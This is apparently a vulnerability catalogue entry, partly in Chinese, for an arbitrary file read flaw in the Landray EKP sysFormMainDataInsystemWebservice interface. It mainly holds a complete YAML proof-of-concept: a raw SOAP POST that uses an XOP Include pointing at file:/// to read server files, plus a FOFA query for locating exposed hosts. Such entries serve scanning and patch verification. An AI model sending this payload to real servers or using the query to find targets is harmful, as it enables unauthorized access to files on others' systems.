landray-ekp-sysFormMainDataInsystemWebservice-fileread: Landray EKP sysFormMainDataInsystemWebservice File Read

日期: 2025-09-01 | 影响软件: Landray EKP | POC: 已公开

漏洞描述

Landray EKP System sysFormMainDataInsystemWebservice interface has an arbitrary file read vulnerability. FOFA: body="Com_Parameter"

PoC代码[已公开]

id: landray-ekp-sysFormMainDataInsystemWebservice-fileread

info:
  name: Landray EKP sysFormMainDataInsystemWebservice File Read
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    Landray EKP System sysFormMainDataInsystemWebservice interface has an arbitrary file read vulnerability.
    FOFA: body="Com_Parameter"
  reference:
    - https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3sysFormMainDataInsystemWebservice%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: landray,fileread
  created: 2024/12/30

set:
  rboundary: randomLowercase(8)
  hostname: request.url.host

rules:
  r0:
    request:
      raw: |-
        POST /sys/webservice/sysFormMainDataInsystemWebservice HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
        Connection: close
        Content-Type: multipart/related; boundary=----{{rboundary}}
        SOAPAction: 
        Accept-Encoding: gzip, deflate

        ------{{rboundary}}
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.maindata.xform.sys.kmss.landray.com/">
        <soapenv:Header/>
        <soapenv:Body>
            <web:getData>
                <arg0>
                    <beginTimeStamp>a</beginTimeStamp>
                    <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"/></count>
                </arg0>
            </web:getData>
        </soapenv:Body>
        </soapenv:Envelope>
        ------{{rboundary}}--
    expression: |
      response.status == 500 &&
      response.body.ibcontains(b'Unmarshalling Error:')
expression: r0()